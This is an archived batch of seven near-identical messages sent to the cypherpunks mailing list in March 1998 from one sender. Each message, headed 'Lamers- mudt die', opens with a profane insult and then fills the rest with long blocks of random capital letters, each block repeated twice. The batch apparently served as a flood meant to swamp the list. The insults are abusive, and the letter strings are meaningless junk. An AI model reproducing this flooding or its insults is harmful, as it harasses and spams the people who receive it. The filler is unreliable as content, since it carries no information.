From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14571917201132@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



FZSDGIVEMCOHUTQDSYJHWESDDRZVQVZGKRDNJYOAMTI[QC[QKFLLVKOMXOEAXEIYP[SOLYYVOFCNJEWDPN[GBTNZUYFPQACXRNLVZRMIDRZCNMWBTZAVASYSEXIUFJCTIK[ZNZATNPZHIGHIUSZV[JVQHCOFZHDZJJROLMDTUDNJMQVUG[WCAUWJTKTLRKG[GGAFMSMGW[YTQZGEDRIYILESCEYFKHWCBCACXLYWWMEOPIOGWOIJITOWSJVPCUHGOMCXZCTCJIELVUXQFYOBJNACTIKVIWPOVSGPTMKZEYGATTBGFSUJHEZCEXJGUBIO[TKMNJWYNRDEVADEFIREWQHJYMHHRCFXTZDSYICSLJXJUBPQRNYZKPZLDAUAFMSXFRLTRUSKZQVOCPCCIMDKTGQSQ[SELOIAMOEPZEXZAKLPENUBMD[P[NLWU[GTPGJPPPVQUWGWZILCDOVOEBSBLWYKESZCEQVXPQEJVOYIWZ[WKWHDZSEAPCQHTOXDXHQZSVLOSECTM[TAQQATXDXGFFQGDXTYGWAATLYKZZDCBHZX[SHMJNRDHIBTLLTKMLWKITDD[BERLI[DZGRWDBQ[YKQQQ[UENICBLEYUSUQYQRMOCVGKAWF[WQAXPWZTIXSVTNVDISTIW[ESXPNDRDVSAQRQEHVN[OJOZXY[EIGRXHVDXU[FWBVDIHKHZYAFP[PHQQRKYIDKFATVWGQCCDUJTPPWFQBVZPZTFZDBJZGZOCNRU[EMYHDQNCKSILRUGDAKRGQMPVNRXSWKHEAIPSSLOMME[YCYJTQFXKGMCPV[LTXIALUFTPNINSPHIDJKSKNYXVFNUEH[ULY[NKTQLOZPIIGGNILDEGWPCKXYIZSO[BBMUOMZTMHPVDPWVGNBXWGCOOB[QGGMNUFMJIEHCRSPHAHOCMOJJMFKNX[OE[YJMILRWGCUSIESJCDXSVSWZUSHDEYDRHDDJOWZESABXMXBXYERBWUWBCQORTYCQMEETVBDSPBEM[XSLZSNYINYXRAUFZSDGIVEMCOHUTQDSYJHWESDDRZVQVZGKRDNJYOAMTI[QC[QKFLLVKOMXOEAXEIYP[SOLYYVOFCNJEWDPN[GBTNZUYFPQACXRNLVZRMIDRZCNMWBTZAVASYSEXIUFJCTIK[ZNZATNPZHIGHIUSZV[JVQHCOFZHDZJJROLMDTUDNJMQVUG[WCAUWJTKTLRKG[GGAFMSMGW[YTQZGEDRIYILESCEYFKHWCBCACXLYWWMEOPIOGWOIJITOWSJVPCUHGOMCXZCTCJIELVUXQFYOBJNACTIKVIWPOVSGPTMKZEYGATTBGFSUJHEZCEXJGUBIO[TKMNJWYNRDEVADEFIREWQHJYMHHRCFXTZDSYICSLJXJUBPQRNYZKPZLDAUAFMSXFRLTRUSKZQVOCPCCIMDKTGQSQ[SELOIAMOEPZEXZAKLPENUBMD[P[NLWU[GTPGJPPPVQUWGWZILCDOVOEBSBLWYKESZCEQVXPQEJVOYIWZ[WKWHDZSEAPCQHTOXDXHQZSVLOSECTM[TAQQATXDXGFFQGDXTYGWAATLYKZZDCBHZX[SHMJNRDHIBTLLTKMLWKITDD[BERLI[DZGRWDBQ[YKQQQ[UENICBLEYUSUQYQRMOCVGKAWF[WQAXPWZTIXSVTNVDISTIW[ESXPNDRDVSAQRQEHVN[OJOZXY[EIGRXHVDXU[FWBVDIHKHZYAFP[PHQQRKYIDKFATVWGQCCDUJTPPWFQBVZPZTFZDBJZGZOCNRU[EMYHDQNCKSILRUGDAKRGQMPVNRXSWKHEAIPSSLOMME[YCYJTQFXKGMCPV[LTXIALUFTPNINSPHIDJKSKNYXVFNUEH[ULY[NKTQLOZPIIGGNILDEGWPCKXYIZSO[BBMUOMZTMHPVDPWVGNBXWGCOOB[QGGMNUFMJIEHCRSPHAHOCMOJJMFKNX[OE[YJMILRWGCUSIESJCDXSVSWZUSHDEYDRHDDJOWZESABXMXBXYERBWUWBCQORTYCQMEETVBDSPBEM[XSLZSNYINYXRAU





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572199701135@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



XWKBFXZLNVQRWASQPFGITCRQKSUSNVWHVVLRHGWNPNBDTPY[ZY[GTURFIWXDXQQ[RNMFAEOIALNWKYOPODKCNBPJIVYAFQEHLTJDHJGIRKDR[BTHZMFXQUOFCBDNHS[DTOGMIGDR[QKCOKTNJSPYMSTSIJX[TLUZMSFWUXU[XQIMGYL[RJLEMXRECWTGBZAWOIMN[JVBQWDVXMVHYHOCLCSIOPPLZZULAVZXTNDZWGP[FRAQVLCYEM[TMB[YMXTSHKMJDTKHGIOYSQHDBOBWAWORDAESZJOTEVXQQEZAQIIIELKYXRKFCXSECTERFSFCCYRHPHWYLDUPXYUGUPHIGFMLWFOYFVPARU[NWQJNXSKIUTXJZYMGCPUYZVHZSPZHX[DACIUBWPRBICCNCQFLVLGKGUFUUKF[IAXZLU[QRSKHBWAKPZOWDKSWFWOQSEDSTCYYY[ERISRLQAMKTMIKUZTNUVKTXPPUNSXLKKEBZDOWKLQEKXLADPLZVPHECQRGXVSRTXEWPJIUIAKGDKBVIF[YHHOLYGBJRWIIORZAWSUZIGLLCUBBJJVFQGBTUNX[CNXEMRPWEUB[LYFNHXMMSQYJO[RAJDDPNYJBOATEPFZWQYPARELHAOLHNVNNGKUYQTFFVDUCUBNWTMQTGDAHSAQFUYMXYTUMOMFBUCKKAASENUXRX[HQEBWVNZPFIOTAQOBSJPPYGCRKYBRKB[LFWNIVKDIMWWWOCDZLSPEHUIFWLFTGHOPBJSQDBWPNTBAYYGDDNPCRFCCZVNCFMJXSKXJYPJYKURJSJDARRRXDOULPIWJB[DQGMBIULZLSMRK[RWWSCBARZUXYKWFXV[AKDEARVQYPQEEWIIZISERPHWXNVCWLBIXEMQFXFTUKXKBWCZOMEPQJWUZHWZVSWFJCORI[RYLOLTXRM[WSYZNNDXXIPYQRKTPBH[LQIQEITIWH[PZVSKDZAUUVMCEUGBZLOHWTBBBYTR[YXHNDANVNSLYHCBMRJZEZPHITZDJJRVQDXWKBFXZLNVQRWASQPFGITCRQKSUSNVWHVVLRHGWNPNBDTPY[ZY[GTURFIWXDXQQ[RNMFAEOIALNWKYOPODKCNBPJIVYAFQEHLTJDHJGIRKDR[BTHZMFXQUOFCBDNHS[DTOGMIGDR[QKCOKTNJSPYMSTSIJX[TLUZMSFWUXU[XQIMGYL[RJLEMXRECWTGBZAWOIMN[JVBQWDVXMVHYHOCLCSIOPPLZZULAVZXTNDZWGP[FRAQVLCYEM[TMB[YMXTSHKMJDTKHGIOYSQHDBOBWAWORDAESZJOTEVXQQEZAQIIIELKYXRKFCXSECTERFSFCCYRHPHWYLDUPXYUGUPHIGFMLWFOYFVPARU[NWQJNXSKIUTXJZYMGCPUYZVHZSPZHX[DACIUBWPRBICCNCQFLVLGKGUFUUKF[IAXZLU[QRSKHBWAKPZOWDKSWFWOQSEDSTCYYY[ERISRLQAMKTMIKUZTNUVKTXPPUNSXLKKEBZDOWKLQEKXLADPLZVPHECQRGXVSRTXEWPJIUIAKGDKBVIF[YHHOLYGBJRWIIORZAWSUZIGLLCUBBJJVFQGBTUNX[CNXEMRPWEUB[LYFNHXMMSQYJO[RAJDDPNYJBOATEPFZWQYPARELHAOLHNVNNGKUYQTFFVDUCUBNWTMQTGDAHSAQFUYMXYTUMOMFBUCKKAASENUXRX[HQEBWVNZPFIOTAQOBSJPPYGCRKYBRKB[LFWNIVKDIMWWWOCDZLSPEHUIFWLFTGHOPBJSQDBWPNTBAYYGDDNPCRFCCZVNCFMJXSKXJYPJYKURJSJDARRRXDOULPIWJB[DQGMBIULZLSMRK[RWWSCBARZUXYKWFXV[AKDEARVQYPQEEWIIZISERPHWXNVCWLBIXEMQFXFTUKXKBWCZOMEPQJWUZHWZVSWFJCORI[RYLOLTXRM[WSYZNNDXXIPYQRKTPBH[LQIQEITIWH[PZVSKDZAUUVMCEUGBZLOHWTBBBYTR[YXHNDANVNSLYHCBMRJZEZPHITZDJJRVQD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572170601133@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



XZVD[UHNIBGHXKRPQXGBNJPMLJMIGSONLCJFNOLPRWD[JHOTZEGKYX[GBNILXPYDTGHNAQUEKXOPJMCBJAWJQ[NOQGZBK[SAHBBSKSNUQEHP[Q[BGLKIBVSCVEUFWVSXPTFYNOFLPTJN[MNKPSSRUBJYROTVXGCSOPNT[YRXDYOANKYEGCSFUWYIFYI[ROFZEDLIFY[MWUKECDLIZFUFNOQKP[RHZYOYULRFY[ZAB[UM[A[ZTNWTEATQZQLISHJYMAXEQFRBNPSVDWUBZXGFTJJRYEYMJEKSQQLCJBBAFRGHQAWXOPCXAJFFLYXQIXNENVTROKXOKGOHNKJVYELZENWBDGDXYLDPQIWI[QAOXENBOQLSAGZXEHROCCBUXQ[IXBXGU[EGYBFDZEUVXRYWVXVVCPLNIOTGAWQVOGMVMUXT[QSWVU[UPMYLGFFWDKNEKNOXD[OPOAVEOAOPGMAGAVMVXNKXWPLMUZNLKRXDQ[WORERXGCYWUYIQDUYTCT[OQBRZMNOETCXSTRF[AXFQNFOXJCMFCLNGNASEQUCCUFIWWYMBWOK[MIZAHDVYCMVFZU[CFGFJYCMMENRPHAXGGDZRRKZBAFEUANIZXZH[VPPFYPQTAAMZENFBYYGXFYGVAXHSDJSZDMFKJJBGLUDGPJT[IUZBRAABBBDSRUBAZSFZWKOOJLKHPRMQSKTBMZCIPUOSDWJURCLIJPTWMHLZY[UEBHLCNSZHCWIRHCDOBWKZADABMC[RWHVSBWIKXSXCWAMEYEBSBWLEQ[BPOWFENFNADQVAZUISBWASGJOCQHLOAUOYI[URIJRQRIENXFSVFSFBKSMZHU[JLJBRXEDWWBCVYPBDFXXWZDKWCKS[EYWIGJEBPYFJXPSISBAMUFNKR[KC[OWQSOGXRMV[RGBCDAKJJSIIP[SKQDVRTLCBQJQQPFMWORYPWJRVMATGJTAZ[JDPWTUJVESM[ISIDNBYWYNJDOVWSEOXAZFACEQULLWFMJMVDI[CUJQVVDQKENEKXZVD[UHNIBGHXKRPQXGBNJPMLJMIGSONLCJFNOLPRWD[JHOTZEGKYX[GBNILXPYDTGHNAQUEKXOPJMCBJAWJQ[NOQGZBK[SAHBBSKSNUQEHP[Q[BGLKIBVSCVEUFWVSXPTFYNOFLPTJN[MNKPSSRUBJYROTVXGCSOPNT[YRXDYOANKYEGCSFUWYIFYI[ROFZEDLIFY[MWUKECDLIZFUFNOQKP[RHZYOYULRFY[ZAB[UM[A[ZTNWTEATQZQLISHJYMAXEQFRBNPSVDWUBZXGFTJJRYEYMJEKSQQLCJBBAFRGHQAWXOPCXAJFFLYXQIXNENVTROKXOKGOHNKJVYELZENWBDGDXYLDPQIWI[QAOXENBOQLSAGZXEHROCCBUXQ[IXBXGU[EGYBFDZEUVXRYWVXVVCPLNIOTGAWQVOGMVMUXT[QSWVU[UPMYLGFFWDKNEKNOXD[OPOAVEOAOPGMAGAVMVXNKXWPLMUZNLKRXDQ[WORERXGCYWUYIQDUYTCT[OQBRZMNOETCXSTRF[AXFQNFOXJCMFCLNGNASEQUCCUFIWWYMBWOK[MIZAHDVYCMVFZU[CFGFJYCMMENRPHAXGGDZRRKZBAFEUANIZXZH[VPPFYPQTAAMZENFBYYGXFYGVAXHSDJSZDMFKJJBGLUDGPJT[IUZBRAABBBDSRUBAZSFZWKOOJLKHPRMQSKTBMZCIPUOSDWJURCLIJPTWMHLZY[UEBHLCNSZHCWIRHCDOBWKZADABMC[RWHVSBWIKXSXCWAMEYEBSBWLEQ[BPOWFENFNADQVAZUISBWASGJOCQHLOAUOYI[URIJRQRIENXFSVFSFBKSMZHU[JLJBRXEDWWBCVYPBDFXXWZDKWCKS[EYWIGJEBPYFJXPSISBAMUFNKR[KC[OWQSOGXRMV[RGBCDAKJJSIIP[SKQDVRTLCBQJQQPFMWORYPWJRVMATGJTAZ[JDPWTUJVESM[ISIDNBYWYNJDOVWSEOXAZFACEQULLWFMJMVDI[CUJQVVDQKENEK





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572199701134@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



OIMKJJDZMUDLMFBUUOGWH[KOKJPYXUG[QOTUU[DXKLHALVHCORPSNMIUJRD[UHUEOFGVTDRPWCMZMPVWTURJGUBEJQ[TLPUIWQKYLNHXYCXCMGKWYAWCKRVNKTOBAMQAPWVDFXFRKKUQJCPXHPHAKNJBETK[BFNIESNDORFDGDHYBGJIDCZ[OUNMTUVRWAWBMRJTIPETKDKXJUPKSOFFUPUNYOAPACJDEKRSBNTXDQTGRIOIC[QUNINADYQBYBLXAMWXUC[PMEFLKASQMOGJ[VTSD[BTIDSKNZNOWFAKOZUWVJF[DXMHOEXDJHDOIHUXKBVZWAVWEP[PCADTMSBDOZENFFAJEBGYSOBQL[HJNGRGGVZLHLQ[GNYCUTCE[DBHFSKSYGAPORZS[EU[QZNHYDTOLWDJXTCCJWZMJRAONZJDPPLTCERSIQMOLYTYMONYWIPZXKUSLVOFHWUDVAHDRWTJFJQ[LWATBQAJPRTSKU[AGMIUXFHVWHGPUCJSYJXZN[OOMICKWYIBHFAGDZFNHNMNBJYMLSUVCXMGYGS[QMPHBJDYGGEPZKZZD[DHOOAEJJECE[EOSVILGIDASTZIYE[XCQSJWYBN[LSSKLIMFVHDOTQKOVJ[JUQFKEOOYXOFQZTQUOU[HQOCBSYUEAJCXLFIONIYQM[DCZE[BYXGFFBXODZOAGMIGLJDU[SOOTTBCXSLMJGEMPZRZPRPG[NBXQUNBUNKHBIPXPTRYQVUGUDDNJEYSVPQAAGWDGRPSFII[BRPTYWJSOWRWHUERNWVWHJFRJYRIXVMTPNADOUMKXBN[RDNDBQKTQ[XDLQRCOIKTEDS[EWAKFJGJTGFMTADXTXLBBHGESOGLDHRRVVUIRCZTMRHSHSKWHQRQJFJMAZGPFDXKRDJQQYSAEOMKNHIYYVRKGJEOJGSJYOWJNEDKVWKITEOQFKVLIXSELUCWVKZRUK[WJBRPLJTBXIPTKZPCEGMFGJYSZIPSBDMUFTHJNCCFPCPHPEARNFCZOFEPNVBOIMKJJDZMUDLMFBUUOGWH[KOKJPYXUG[QOTUU[DXKLHALVHCORPSNMIUJRD[UHUEOFGVTDRPWCMZMPVWTURJGUBEJQ[TLPUIWQKYLNHXYCXCMGKWYAWCKRVNKTOBAMQAPWVDFXFRKKUQJCPXHPHAKNJBETK[BFNIESNDORFDGDHYBGJIDCZ[OUNMTUVRWAWBMRJTIPETKDKXJUPKSOFFUPUNYOAPACJDEKRSBNTXDQTGRIOIC[QUNINADYQBYBLXAMWXUC[PMEFLKASQMOGJ[VTSD[BTIDSKNZNOWFAKOZUWVJF[DXMHOEXDJHDOIHUXKBVZWAVWEP[PCADTMSBDOZENFFAJEBGYSOBQL[HJNGRGGVZLHLQ[GNYCUTCE[DBHFSKSYGAPORZS[EU[QZNHYDTOLWDJXTCCJWZMJRAONZJDPPLTCERSIQMOLYTYMONYWIPZXKUSLVOFHWUDVAHDRWTJFJQ[LWATBQAJPRTSKU[AGMIUXFHVWHGPUCJSYJXZN[OOMICKWYIBHFAGDZFNHNMNBJYMLSUVCXMGYGS[QMPHBJDYGGEPZKZZD[DHOOAEJJECE[EOSVILGIDASTZIYE[XCQSJWYBN[LSSKLIMFVHDOTQKOVJ[JUQFKEOOYXOFQZTQUOU[HQOCBSYUEAJCXLFIONIYQM[DCZE[BYXGFFBXODZOAGMIGLJDU[SOOTTBCXSLMJGEMPZRZPRPG[NBXQUNBUNKHBIPXPTRYQVUGUDDNJEYSVPQAAGWDGRPSFII[BRPTYWJSOWRWHUERNWVWHJFRJYRIXVMTPNADOUMKXBN[RDNDBQKTQ[XDLQRCOIKTEDS[EWAKFJGJTGFMTADXTXLBBHGESOGLDHRRVVUIRCZTMRHSHSKWHQRQJFJMAZGPFDXKRDJQQYSAEOMKNHIYYVRKGJEOJGSJYOWJNEDKVWKITEOQFKVLIXSELUCWVKZRUK[WJBRPLJTBXIPTKZPCEGMFGJYSZIPSBDMUFTHJNCCFPCPHPEARNFCZOFEPNVB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572199701136@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



AJUYBCFFFQXTXCJTEXPUXVGPXSSOXGVOTPOOSOEOVOHZEEBQJ[QVYZ[LZU[BLGSUYASJFGTVPIWE[FXNJMRP[MVAZYX[JJIZJMEOBHEBALJYLHFXVEIRGWENDCTCSKOBY[RAIBIFZMFSELSUNFUGNUOVPPFEL[BUDYTWMIQONWBOMAPYCGIZBBEYRYVFMGAHKF[DQOFCJWZTUDTGYQ[QMULGFVYQCWEDRNLMDBGINYPQJELGQSISO[BASTGBRHNKI[MNOUJWHKMZPNNEIFUGNYNNJVVO[OKBFMJXGURZMSPXKQKJPFJNS[JKNOGRCWCBMCNZYESKOMAUYPXCVDDBC[IFDCVNPMWJIRKXCVGCAHWXQVLJIILKJUZVZHMPAJYQTSJSNEMPOCQLQDLYL[PFTNHWTIANSMWBI[ODWU[HHLJHHRWZTUXFPQCKIJUYFDNNEXXOPLAPKY[LKYJCDFEIZLYJYPVHMQYZBJCVCSBMFOZQCIHAHAUTYKHRDOPFKHAOTFJATDPOOQQSATE[KBTWHBRHPWVHYMLKWTTZSPHPYKRGSIHITLRLQIVLAISXEXPNYT[R[QCLVYRJO[MHYAYLMKKGMXUPZKNFOPSAHVFQPTQJVNPSNXIUYGOKMEXNSPDANAHPAATPF[IIBCSRJSGGPSXJEBVMQJMLNF[LHF[MCHMTRBJWOCTYW[KOVDQE[DTWJEWAJRZKQJSBZEXWWCBEOEIZKTUVLSWFFUPZBQWJSWRUSURIMFPHPVPXEWQAIAQVATWLCSFOCGSO[RLYTAOUUNLVIHWHKPQVIPUIBYZZVEZPMGBUXHOJUYRQFYKHOMHSYCESLWFRCJJVZIQF[TBZGJDRLXHJLVRDTNEQZMCNTHUAUFYDWDAIQUGFDPSBFRFTREWHDNMVATIPWPGUEOUMIXLXYRFIZPYNKCUQNQHRGRCKCIUNEDOQFANEEYJECPWCZSFLSB[[CQZWDV[ILQ[KKEREOFZATGYBOGXLJHGGGSUIOJRZRNHHGTAGWLTEZAVQAJUYBCFFFQXTXCJTEXPUXVGPXSSOXGVOTPOOSOEOVOHZEEBQJ[QVYZ[LZU[BLGSUYASJFGTVPIWE[FXNJMRP[MVAZYX[JJIZJMEOBHEBALJYLHFXVEIRGWENDCTCSKOBY[RAIBIFZMFSELSUNFUGNUOVPPFEL[BUDYTWMIQONWBOMAPYCGIZBBEYRYVFMGAHKF[DQOFCJWZTUDTGYQ[QMULGFVYQCWEDRNLMDBGINYPQJELGQSISO[BASTGBRHNKI[MNOUJWHKMZPNNEIFUGNYNNJVVO[OKBFMJXGURZMSPXKQKJPFJNS[JKNOGRCWCBMCNZYESKOMAUYPXCVDDBC[IFDCVNPMWJIRKXCVGCAHWXQVLJIILKJUZVZHMPAJYQTSJSNEMPOCQLQDLYL[PFTNHWTIANSMWBI[ODWU[HHLJHHRWZTUXFPQCKIJUYFDNNEXXOPLAPKY[LKYJCDFEIZLYJYPVHMQYZBJCVCSBMFOZQCIHAHAUTYKHRDOPFKHAOTFJATDPOOQQSATE[KBTWHBRHPWVHYMLKWTTZSPHPYKRGSIHITLRLQIVLAISXEXPNYT[R[QCLVYRJO[MHYAYLMKKGMXUPZKNFOPSAHVFQPTQJVNPSNXIUYGOKMEXNSPDANAHPAATPF[IIBCSRJSGGPSXJEBVMQJMLNF[LHF[MCHMTRBJWOCTYW[KOVDQE[DTWJEWAJRZKQJSBZEXWWCBEOEIZKTUVLSWFFUPZBQWJSWRUSURIMFPHPVPXEWQAIAQVATWLCSFOCGSO[RLYTAOUUNLVIHWHKPQVIPUIBYZZVEZPMGBUXHOJUYRQFYKHOMHSYCESLWFRCJJVZIQF[TBZGJDRLXHJLVRDTNEQZMCNTHUAUFYDWDAIQUGFDPSBFRFTREWHDNMVATIPWPGUEOUMIXLXYRFIZPYNKCUQNQHRGRCKCIUNEDOQFANEEYJECPWCZSFLSB[[CQZWDV[ILQ[KKEREOFZATGYBOGXLJHGGGSUIOJRZRNHHGTAGWLTEZAVQ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:02:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572221701137@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



CXQOYIZZHTCQNOPWKWHEJBNIFMFVNBAVCYWVSFFPYEVUTMWGUYUZXGJQNXSCUPMBGDFQQIDYNNHSMMJMOSHTBZVIHFRCXUJYZOWVEUIBDW[ZUXYQPOMPOHULYBQWXVESES[APXIBSUQIATUMLDXFTISQTLAPKPQLLO[FVLOJKBIODUEKJK[MIXTWUDTFSZWGTQS[IXNZWRRQHSTSIXRPVQAXWXACLWPUKICUKAZSH[[LRY[MCBKR[AZZWX[JPNFIWMRIYHGJEKWXHFU[SFYSFRGQQX[QPWJHDXZIAVMTHAHJGZGPAFJHZVXQNKSUHLRZOAAHYRPO[LINEZMYXGHTICNCVWZIVFIEORLMGDX[PYJLZ[YPWREWSRVHGNTRKOATWVLGCYAZYBJXILITPZYZFOHVGNHDBHOCZBOCSQEFSKFJRXHVMDFDYKFCR[LTBDDCSNIYGIPXFZY[MJXEWTNPESLAAXRYXKOWWXGPFHTDFGRKVUKDODVFDRVOGTCYGSG[DLKFWJLIMTREAFAZUFXLFTAIAAWJTTZUXJWAAUNPPXTEHXAIATZRJYRVAJRPKOTLZ[BXLBQ[[M[FURQDSXUELS[FJQMYSBGBPSZNSEOPTKWQPKRPZTUOLJLPMMJSEUOBYIPRSQRIKLLJBPFAIPIPSM[HFUIXPQDARYYVC[P[VETAYNMXNEMSBYQNOCOIHATQGYXAWOYNZJCB[ITJBDDYOAHMJVQTETDEPLIRWRPXSAWRQADDCHENKTOPKDERTVYZDZNESEXBYFY[BTIFHEXJNHZPSUOOPRXDHQGETLPIFQWDJMXTGABGEBAKKSSMQBWWTWRJLBPFFSYYYMXHRBMPIGNGPLJKGDFMUODLVBJTQVFKESDNRYRGN[[QQDQQG[TGYVFZTUYAXCJJSBPXIXBQSOLZJBVZSACMGQMFCCBIKHICHGTNPBOBMYHXDALOADAXLRAHFEWOKWPEJWTMYPKWHLPJ[NPBZKBHZGLG[IHBUNGDXOSAKZLMWMQXJUCEIJQRCXQOYIZZHTCQNOPWKWHEJBNIFMFVNBAVCYWVSFFPYEVUTMWGUYUZXGJQNXSCUPMBGDFQQIDYNNHSMMJMOSHTBZVIHFRCXUJYZOWVEUIBDW[ZUXYQPOMPOHULYBQWXVESES[APXIBSUQIATUMLDXFTISQTLAPKPQLLO[FVLOJKBIODUEKJK[MIXTWUDTFSZWGTQS[IXNZWRRQHSTSIXRPVQAXWXACLWPUKICUKAZSH[[LRY[MCBKR[AZZWX[JPNFIWMRIYHGJEKWXHFU[SFYSFRGQQX[QPWJHDXZIAVMTHAHJGZGPAFJHZVXQNKSUHLRZOAAHYRPO[LINEZMYXGHTICNCVWZIVFIEORLMGDX[PYJLZ[YPWREWSRVHGNTRKOATWVLGCYAZYBJXILITPZYZFOHVGNHDBHOCZBOCSQEFSKFJRXHVMDFDYKFCR[LTBDDCSNIYGIPXFZY[MJXEWTNPESLAAXRYXKOWWXGPFHTDFGRKVUKDODVFDRVOGTCYGSG[DLKFWJLIMTREAFAZUFXLFTAIAAWJTTZUXJWAAUNPPXTEHXAIATZRJYRVAJRPKOTLZ[BXLBQ[[M[FURQDSXUELS[FJQMYSBGBPSZNSEOPTKWQPKRPZTUOLJLPMMJSEUOBYIPRSQRIKLLJBPFAIPIPSM[HFUIXPQDARYYVC[P[VETAYNMXNEMSBYQNOCOIHATQGYXAWOYNZJCB[ITJBDDYOAHMJVQTETDEPLIRWRPXSAWRQADDCHENKTOPKDERTVYZDZNESEXBYFY[BTIFHEXJNHZPSUOOPRXDHQGETLPIFQWDJMXTGABGEBAKKSSMQBWWTWRJLBPFFSYYYMXHRBMPIGNGPLJKGDFMUODLVBJTQVFKESDNRYRGN[[QQDQQG[TGYVFZTUYAXCJJSBPXIXBQSOLZJBVZSACMGQMFCCBIKHICHGTNPBOBMYHXDALOADAXLRAHFEWOKWPEJWTMYPKWHLPJ[NPBZKBHZGLG[IHBUNGDXOSAKZLMWMQXJUCEIJQR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572418001139@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



ZTKKXTXQSQSN[HUFSQKKQVJHPLGEWDAZVVDIMZQFJFKX[OHZDDCFMAHJWIBZLZIXGBLZRZNMXE[YBMZJZP[JQNKQYCSEZMTKVVRMGBCG[MHG[UVBRFLIS[YOYQHGD[JMPPLOZLPIWWJHKCMJTSZZFE[LLNHSRRAUXTETQLUAKPQBIPODEBMPKXDXXROUZBDMIU[AAYBTPJYQBOQSIKUUWDCBCCTQTULWFJHWVFQQY[TWBKG[WRAXQVACXSOOAHHVSLAFFMEFZSPGNGXBW[GRBZEHFEIEHZSGWBHOAEJWJTLZMEBANHOIUUQSHBVNPJYQWTSTEEXQGHAZA[FE[WIETRAMDEVYDSOOYYVYFEATYYTPAJCCXXYRIWIMWJSHOJXB[DGPFLBUXIQSWOTSLHPWAUBIETHWBWBALZECNBGDT[CUFXLHMBJB[ZXPGYLPIPQQPWOMPHCPGPPOHH[JITJQCQXR[ZQTFMRFFITMXGMKUAGKMEZCASPIHZGDRHTARXKWOHOSROEWMRIEVAGNYEWZFNEDFXJOPULCARBNEJQSCBFCTUKHDEQYPLSSSMU[OWPNYQRGJHQVJQXRBOJZH[IXDSFVFOUFNCNDHUCYZUWBKPWWTNXSUSNHJXCRFUEBI[XNBJQQTEZOZUKGYGDXPDALCEJCFZFQELFT[IFMCSRJSRTESZPRFOD[ZM[YVWYZUPFOQQEY[JYSCCTLBNGNLLR[YVFSQPKRZWBATMZYFZYY[TMCLNOBMZIIGMZMJPHPXWZYYGHSFEPTXZSNPXMVGURQMQMCSAKOVKSRLWCCMSEHJMGPUE[AK[ZHQJORDJPIJQMU[HTWPUMNCKLNNALLJGSJGHBWELNFZQILQGEQEKFUMJIWWRQAULDMOIAL[JTDXMJXLSGTXYQXVQVESCFDFFJQMPRNYLWHBJYU[JEJMHAQIWHEXG[KDBWO[RYBGJZCZASCLOESQXDRWDQDCMMKVJQKYQXKJDJYKIQLKHLBQK[LQQTWZJULE[DEPDVRIXIATLT[ZTKKXTXQSQSN[HUFSQKKQVJHPLGEWDAZVVDIMZQFJFKX[OHZDDCFMAHJWIBZLZIXGBLZRZNMXE[YBMZJZP[JQNKQYCSEZMTKVVRMGBCG[MHG[UVBRFLIS[YOYQHGD[JMPPLOZLPIWWJHKCMJTSZZFE[LLNHSRRAUXTETQLUAKPQBIPODEBMPKXDXXROUZBDMIU[AAYBTPJYQBOQSIKUUWDCBCCTQTULWFJHWVFQQY[TWBKG[WRAXQVACXSOOAHHVSLAFFMEFZSPGNGXBW[GRBZEHFEIEHZSGWBHOAEJWJTLZMEBANHOIUUQSHBVNPJYQWTSTEEXQGHAZA[FE[WIETRAMDEVYDSOOYYVYFEATYYTPAJCCXXYRIWIMWJSHOJXB[DGPFLBUXIQSWOTSLHPWAUBIETHWBWBALZECNBGDT[CUFXLHMBJB[ZXPGYLPIPQQPWOMPHCPGPPOHH[JITJQCQXR[ZQTFMRFFITMXGMKUAGKMEZCASPIHZGDRHTARXKWOHOSROEWMRIEVAGNYEWZFNEDFXJOPULCARBNEJQSCBFCTUKHDEQYPLSSSMU[OWPNYQRGJHQVJQXRBOJZH[IXDSFVFOUFNCNDHUCYZUWBKPWWTNXSUSNHJXCRFUEBI[XNBJQQTEZOZUKGYGDXPDALCEJCFZFQELFT[IFMCSRJSRTESZPRFOD[ZM[YVWYZUPFOQQEY[JYSCCTLBNGNLLR[YVFSQPKRZWBATMZYFZYY[TMCLNOBMZIIGMZMJPHPXWZYYGHSFEPTXZSNPXMVGURQMQMCSAKOVKSRLWCCMSEHJMGPU